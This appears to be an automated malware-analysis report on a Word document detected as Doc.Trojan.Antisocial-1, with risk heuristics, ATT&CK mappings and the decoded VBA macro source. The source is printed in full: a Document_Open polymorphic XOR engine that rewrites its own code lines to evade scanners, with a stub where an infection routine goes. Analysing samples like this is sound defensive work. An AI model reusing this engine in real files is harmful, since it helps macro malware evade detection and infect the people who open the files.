MALICIOUS
180
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1566.001 Spearphishing Attachment
The file is identified as malicious by ClamAV and contains VBA macros. The 'Document_Open' macro is present, which is a common technique for executing malicious code upon opening the document. The script employs a custom poly-encryption engine, suggesting an attempt to evade detection. The primary function of the script appears to be obfuscating its own code and preparing for further execution, likely involving a second-stage payload.
Heuristics 3
-
ClamAV: Doc.Trojan.Antisocial-1 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Trojan.Antisocial-1
-
VBA macros detected medium 1 related finding OLE_VBA_MACROSDocument contains VBA macro code
-
Document_Open macro high OLE_VBA_DOCOPENDocument_Open macro
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 4892 bytes |
SHA-256: 1cc9ae4e7d0e32a5189b29ef941f261f9c3f943f54813a8572ac6b6fbfd3343e |
|||
|
Detection
ClamAV:
Doc.Trojan.Antisocial-1
Obfuscation or payload:
unlikely
|
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Attribute VB_Name = "Modul 1" ' '=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= ' AntiSocial Poly-Encryption Engine v.1.0 'By Lys Kovick For The Alcoholic Anarchists of America (AAA) '=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= ' Private Sub Document_Open() For V1 = 17 To 28 '//Adjust V1 For Line Changes! V2 = Null V3 = (ThisDocument.VBProject.VBComponents.Item(1).CodeModule.Lines(V1, 1)) V4 = Asc((Mid(V3, 2, 1))) V5 = V4 Xor 39 For V6 = 3 To Len(V3) V7 = Asc(Mid(V3, V6, 1)) Xor V5 V2 = V2 & Chr(V7) Next V6 V8 = V2 ThisDocument.VBProject.VBComponents.Item(1).CodeModule.ReplaceLine V1, V8 Next V1 Call VM End Sub Private Sub VM() For V1 = 17 To 28 '//Adjust V1 For Line Changes! V2 = Null V3 = "'" & (ThisDocument.VBProject.VBComponents.Item(1).CodeModule.Lines(V1, 1)) V4 = Int(Rnd() * 8) + 1 For V5 = 1 To Len(V3) V6 = Asc(Mid(V3, V5, 1)) Xor V4 V2 = V2 & Chr(V6) Next V5 V7 = V2 ThisDocument.VBProject.VBComponents.Item(1).CodeModule.ReplaceLine V1, "'" & V7 Next V1 '//Put Infection Routine Here... End Sub ' Processing file: /opt/analyzer/scan_staging/4b6d7c8c4bc04dc683c1052cfd57285c.bin ' =============================================================================== ' Module streams: ' Macros/VBA/ThisDocument - 903 bytes ' Macros/VBA/Modul 1 - 2779 bytes ' Line #0: ' QuoteRem 0x0000 0x0000 "" ' Line #1: ' QuoteRem 0x0000 0x003B "=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=" ' Line #2: ' QuoteRem 0x0000 0x0031 " AntiSocial Poly-Encryption Engine v.1.0" ' Line #3: ' QuoteRem 0x0000 0x003B "By Lys Kovick For The Alcoholic Anarchists of America (AAA)" ' Line #4: ' QuoteRem 0x0000 0x003B "=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=" ' Line #5: ' QuoteRem 0x0000 0x0000 "" ' Line #6: ' Line #7: ' FuncDefn (Private Sub Document_Open()) ' Line #8: ' StartForVariable ' Ld V1 ' EndForVariable ' LitDI2 0x0011 ' LitDI2 0x001C ' For ' QuoteRem 0x0012 0x001D "//Adjust V1 For Line Changes!" ' Line #9: ' LitVarSpecial (Null) ' St V2 ' Line #10: ' Ld V1 ' LitDI2 0x0001 ' LitDI2 0x0001 ' Ld ThisDocument ' MemLd VBProject ' MemLd VBComponents ' ArgsMemLd Item 0x0001 ' MemLd CodeModule ' ArgsMemLd Lines 0x0002 ' Paren ' St V3 ' Line #11: ' Ld V3 ' LitDI2 0x0002 ' LitDI2 0x0001 ' ArgsLd Mid$ 0x0003 ' Paren ' ArgsLd Asc 0x0001 ' St V4 ' Line #12: ' Ld V4 ' LitDI2 0x0027 ' Xor ' St V5 ' Line #13: ' StartForVariable ' Ld V6 ' EndForVariable ' LitDI2 0x0003 ' Ld V3 ' FnLen ' For ' Line #14: ' Ld V3 ' Ld V6 ' LitDI2 0x0001 ' ArgsLd Mid$ 0x0003 ' ArgsLd Asc 0x0001 ' Ld V5 ' Xor ' St V7 ' Line #15: ' Ld V2 ' Ld V7 ' ArgsLd Chr 0x0001 ' Concat ' St V2 ' Line #16: ' StartForVariable ' Ld V6 ' EndForVariable ' NextVar ' Line #17: ' Ld V2 ' St V8 ' Line #18: ' Ld V1 ' Ld V8 ' LitDI2 0x0001 ' Ld ThisDocument ' MemLd VBProject ' MemLd VBComponents ' ArgsMemLd Item 0x0001 ' MemLd CodeModule ' ArgsMemCall ReplaceLine 0x0002 ' Line #19: ' StartForVariable ' Ld V1 ' EndForVariable ' NextVar ' Line #20: ' ArgsCall (Call) VM 0x0000 ' Line #21: ' EndSub ' Line #22: ' FuncDefn (Private Sub VM()) ' Line #23: ' StartForVariable ' Ld V1 ' EndForVariable ' LitDI2 0x0011 ' LitDI2 0x001C ' For ' QuoteRem 0x0012 0x001D "//Adjust V1 For Line Changes!" ' Line #24: ' LitVarSpecial (Null) ' St V2 ' Line #25: ' LitStr 0x0001 "'" ' Ld V1 ' LitDI2 0x0001 ' LitDI2 0x0001 ' Ld ThisDocument ' MemLd VBProject ' MemLd VBComponents ' ArgsMemLd Item 0x0001 ' MemLd CodeModule ' ArgsMemLd Lines 0x0002 ' Paren ' Concat ' St V3 ' Line #26: ' ArgsLd Rnd 0x0000 ' LitDI2 0x0008 ' Mul ' FnInt ' LitDI2 0x0001 ' Add ' St V4 ' Line #27: ' ... (truncated) |
|||
Open this report in the interactive analyzer, or submit your own file for analysis.